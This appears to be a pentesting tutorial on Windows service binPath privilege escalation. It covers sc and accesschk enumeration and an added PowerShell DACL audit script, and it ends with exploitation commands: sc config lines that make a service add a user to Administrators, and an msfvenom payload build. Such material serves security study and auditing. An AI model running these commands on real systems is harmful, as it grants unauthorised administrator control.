Insecure Service Permissions (binPath)

Windows services often run with high privileges and can be misconfigured to allow local privilege escalation. If a user has permission to modify the binPath of a service, they may be able to execute arbitrary code with SYSTEM privileges.

Service Basics

sc create up-server binPath= "C:\Windows\System32\PING.exe"
sc qc up-server 
sc query up-server 
sc start up-server 
sc config up-server binPath= "C:\Windows\System32\PING.exe 8.8.8.8"
sc start up-server

Enumeration Techniques

  • PowerUp - part of PowerSploit, used for service misconfiguration enumeration

  • Sysinternals accesschk.exe

accesschk.exe -uvwc <service_name>
accesschk.exe -uvwc up-server

Service Permission Enumeration with accesschk

Use accesschk.exe (from Sysinternals) to identify misconfigured services where low-privileged users can start, stop or modify service configurations. The following command checks all services (*) to see what permissions the user DevNull has, especially whether they can start, stop or change service configurations.

accesschk.exe -uwcv DevNull *

Verifies what access the Administrators group has over all services. Useful to confirm expected behaviour for a high-privileged group.

accesschk.exe -uwcv administrators *

Checks what the standard Users group can do on all services. If users can modify services, this is a severe misconfiguration.

accesschk.exe -uwcv users *

Checks what access the Everyone group has to all services. If Everyone has write/start permissions, it likely leads to privilege escalation.

accesschk.exe -uwcv Everyone *

Displays detailed permissions (-qv) for the copyfile service. Use this to inspect a specific service's discretionary access control list (DACL).

accesschk.exe /accepteula -uwcqv copyfile

Manual sc based enumeration

sc query state= all | findstr "SERVICE_NAME:" >> C:\Users\Public\servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Users\Public\servicenames.txt) DO @echo %i >> C:\Users\Public\services.txt
FOR /F %i in (C:\Users\Public\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Users\Public\path.txt
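As an added example (not part of the original notes), the same audit that the accesschk and sc loops above perform, done in PowerShell: it reads each service's security descriptor with sc.exe sdshow and flags services where Everyone, Authenticated Users, Users or INTERACTIVE hold SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or generic write/all rights, printing the current binPath for each finding. It assumes Windows PowerShell 5.1 or later and that the running user may read the descriptors; the service names it reports are whatever is on the host.

```powershell
# Added audit example (not from the original notes): flag services whose DACL grants
# configuration-changing rights to low-privileged principals.
$ChangeConfig = 0x0002       # SERVICE_CHANGE_CONFIG: rewrite binPath and other settings
$WriteDac     = 0x40000      # WRITE_DAC: rewrite the service DACL itself
$WriteOwner   = 0x80000      # WRITE_OWNER: take ownership, then rewrite the DACL
$GenericAll   = 0x10000000   # GA: full control
$GenericWrite = 0x40000000   # GW: maps onto SERVICE_CHANGE_CONFIG
$Dangerous    = $ChangeConfig -bor $WriteDac -bor $WriteOwner -bor $GenericAll -bor $GenericWrite

# Well-known low-privileged SIDs: Everyone, Authenticated Users, BUILTIN\Users, INTERACTIVE
$LowPriv = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4')

function Get-WeakServiceAces {
    foreach ($svc in Get-Service) {
        # sc sdshow prints a blank line followed by the SDDL string ("D:(A;;...)S:(AU;...)")
        $sddl = (sc.exe sdshow "$($svc.Name)" | ForEach-Object { $_.Trim() } |
                 Where-Object { $_ -match '^D:' }) -join ''
        if (-not $sddl) { continue }   # access denied or unexpected output: skip
        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
        foreach ($ace in $sd.DiscretionaryAcl) {
            if ($ace.AceType -ne 'AccessAllowed') { continue }
            if ($LowPriv -notcontains $ace.SecurityIdentifier.Value) { continue }
            if (($ace.AccessMask -band $Dangerous) -eq 0) { continue }
            [pscustomobject]@{
                Service    = $svc.Name
                Principal  = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value
                AccessMask = ('0x{0:X}' -f $ace.AccessMask)
                BinPath    = (Get-CimInstance Win32_Service -Filter "Name='$($svc.Name)'").PathName
            }
        }
    }
}

Get-WeakServiceAces | Format-Table -AutoSize
```

Any row in the output is a service a standard user could repoint; the expected result on a hardened host is no rows.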

Exploitation Steps

1. Update binPath to a malicious command or executable

sc config <service_name> binPath= "net localgroup administrators DevNull /add"
sc start <service_name>

2. Point a service to a custom EXE

sc config <service_name> binPath= "C:\Users\Public\test.exe"
sc start <service_name>

3. Optional: Stop or Restart the service if needed

sc stop <service_name>
sc start <service_name>

4. Payload generation

  • Create malicious EXE using msfvenom

msfvenom -p windows/exec CMD="net localgroup administrators u1 /add" -f exe > Registry.exe
  • Replace the original executable referenced in binPath
